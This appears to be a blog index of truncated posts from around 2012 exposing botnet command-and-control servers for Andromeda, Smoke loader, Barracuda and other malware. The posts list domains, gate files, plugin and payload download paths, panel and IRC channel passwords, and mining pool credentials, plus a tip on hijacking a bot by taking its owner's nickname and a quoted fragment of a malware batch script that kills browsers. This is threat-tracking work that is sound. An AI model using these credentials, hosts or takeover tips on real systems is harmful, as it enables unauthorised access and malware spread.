Resolved zqpoetyafw.org to 108.63.14.21 Server: zqpoetyafw.org Port: 20001 Note: Not an irc. Don’t waste your time trying to connect. This is one of snk’s bots. It’s being loaded from his irc. * Topic for #load is: !j -c RU,RUS #r2 !j #xtp !dl hxxp://hotfile.com/dl/178567859/27b7e85/41aa2c2d8.html * Topic for #load set by lol at Mon Nov 05Read more...
mirror.serverhalflife.com (Pandora http bot hosted by Netherlands Haarlem Leaseweb B.v.)
Resolved mirror.serverhalflife.com to 95.211.209.178 Pandora ddos bot Server: mirror.serverhalflife.com Gate file: /pando/?u=17b6n82405v5ycal3ks4bb7i655e088m Other crap on the server Microworm panel: mirror.serverhalflife.com/micro/ The password is “root” Files are located at hxxp://mirror.serverhalflife.com/files/ blackdra.exe is blackshades Connects to own3d-private.no-ip.org:4010 Blackshades downloads more of the files x0x0.294.24.10.10.0.2.15.0.0.0.Federal-Agent.FBI-PC.1.Microsoft Windows XP .522.0.5.0.58802054.0.new.November 4, 2012.Hide My Ass Vpn FBI access panel (Welcome AgentRead more...
vvv.exp1oit.in (Andromeda http hosted by France Roubaix Ovh Sas)
Resolved vvv.exp1oit.in to 178.33.241.61 This is the new andromeda of the french guy. It is the full version with all of the plugins. Server: vvv.exp1oit.in Gate file: /google/image.php Plugins: Formgrabber: beautyoftheworld.ca/xs/f.pack Gate file: /google/fg.php Socks: beautyoftheworld.ca/xs/s.pack Rootkit: beautyoftheworld.ca/xs/r.pack Downloads files from hxxp://jamboproducciones.com/xs/ and hxxp://ez-cs.net/dk/ He also has a new smoke loader up Server: smk.cheatgame.org GateRead more...
ultimatecore.info (Andromeda http bot hosted by Ukraine Ukrainian Internet Names Center Ltd)
Resolved ultimatecore.info to 91.231.84.114 New andromeda from this guy. Server: ultimatecore.info Gate file: /mario/root.php This is the full version of andromeda, with all of the plugins. Plugins: Formgrabber plugin: ultimatecore.info/test/f.pack Gate file: /mario/fg.php Socks plugin: ultimatecore.info/test/s.pack Rootkit plugin: ultimatecore.info/test/r.pack Hosting infos: http://whois.domaintools.com/91.231.84.114 Edit: Plugins are now at ultimatecore.info/samuelkaptioalpha1/ I think you can guess what eachRead more...
paradoxunirc.no-ip.biz (Barracuda irc bot hosted by Turkey Istanbul Radore Hosting Telekomunikasyon Hizmetleri San. Ve Tic. Ltd. Sti.)
Resolved paradoxunirc.no-ip.biz to 176.53.119.14 Server: paradoxunirc.no-ip.biz Port: 4667 Channel: #yoloswag Owner: Paradoxun This is the latest irc of the barracuda .net irc bot. After trolling around for a bit, it’s time for this one to be posted. The Authost on the bot only checks for the nick, so just wait for Paradoxun to leave, /nickRead more...
supervids.net (Lilyjade script hiding behind/proxied by cloudflare)
I was looking at some of the files being installed from a recent posting, when I found something interesting. It looks like someone else is trying out lilyjade. The extensions are held in a self extracting archive and installed via a batch file. @echo off //Kill Proccess TASKKILL /F /IM firefox.exe TASKKILL /F /IM chrome.exeRead more...
amazinghost.lt, yahgodz.com (Smoke and Andromeda loaders hosted by Netherlands Maasdijk Worldstream)
I happened to notice some people taking about one of mysticals old domains, indicating that it had been sold. I decided to check out the domains I had listed in the blog post to see what was on them. I found something new on 307dice.com Smoke loader Server: 307dice.com Gate file: /cp/index.php Check out 307dice.com/cp/guest.phpRead more...
cheatmodernwarfare.com (Multiple http bots hosted by Romania Torben Diehr)
Posting some french heckers stuff Andromeda loader Server: cheatmodernwarfare.com Gate file: /xbox/image.php Rootkit plugin: hxxp://magnatesmobileapps.com/sym/r.pack Socks plugin: hxxp://magnatesmobileapps.com/sym/s.pack Backup domains: down4life.hopto.org explosiontaracesavatoutdechirer.chickenkiller.com fckd330.mooo.com kbot Server: h4r3.hopto.org redirects to: kb.itprosolutions.org Gate file: /joomla/gate.php Server: purenet.hopto.org Redirects to: 91.234.105.14 Gate file: /kb/gate.php Server: smk.cheatgame.org Gate file: /kb/gate.php Smoke loader (Currently down) Server: smk.cheatmodernwarfare.com Gate file: /s2/control.php HostbooterRead more...
chat.barracudasec.com (Barracuda ircbotnet hosted by Luxembourg Luxembourg Root Sa)
Resolved chat.barracudasec.com to 94.242.204.181 Server: chat.barracudasec.com Ports: 1337,4667 (bots connect on 4667) Channel: #xxploasion Channel passoword: Rebels2012 Channel: #hflove Channel passoword: inspiron Connects using the no-ip hflove.no-ip.org Channel: #gavin0hanson Channel password: hanson911 Channel Users Topic #xxploasion 4 [+sntu] #hflove 45 [+s] #gavin0hanson 53 [+sntu] This irc server is similar to cmjc.whhcd.info in that is itRead more...
planetstat2324.su (smoke loader http bot hosted by Poland Artnet Spolka Z Ograniczona Odpowiedzialnoscia)
This is the http loader for the gold installs ppi program. Resolved planetstat2324.su to 178.255.43.67 Server: planetstat2324.su Gate file: /gamenew/index.php Downloads files from ap2producoes.com/images/ minsabdedf.exe bitcoin miner pool info: http://hernyoooo@ymail.com:Bazdmeg1@pool.50btc.com:8332 ginamdasm.exe The file botnet owners are given installs smoke from hxxp://oroihfdbbnennm.in/update/0pdat3.exe Install statistics are then recorded by oroihfdbbnennm.in/activation.php Using the format activation.php?productid=(userid)&serial=(long string) Hosting infos:Read more...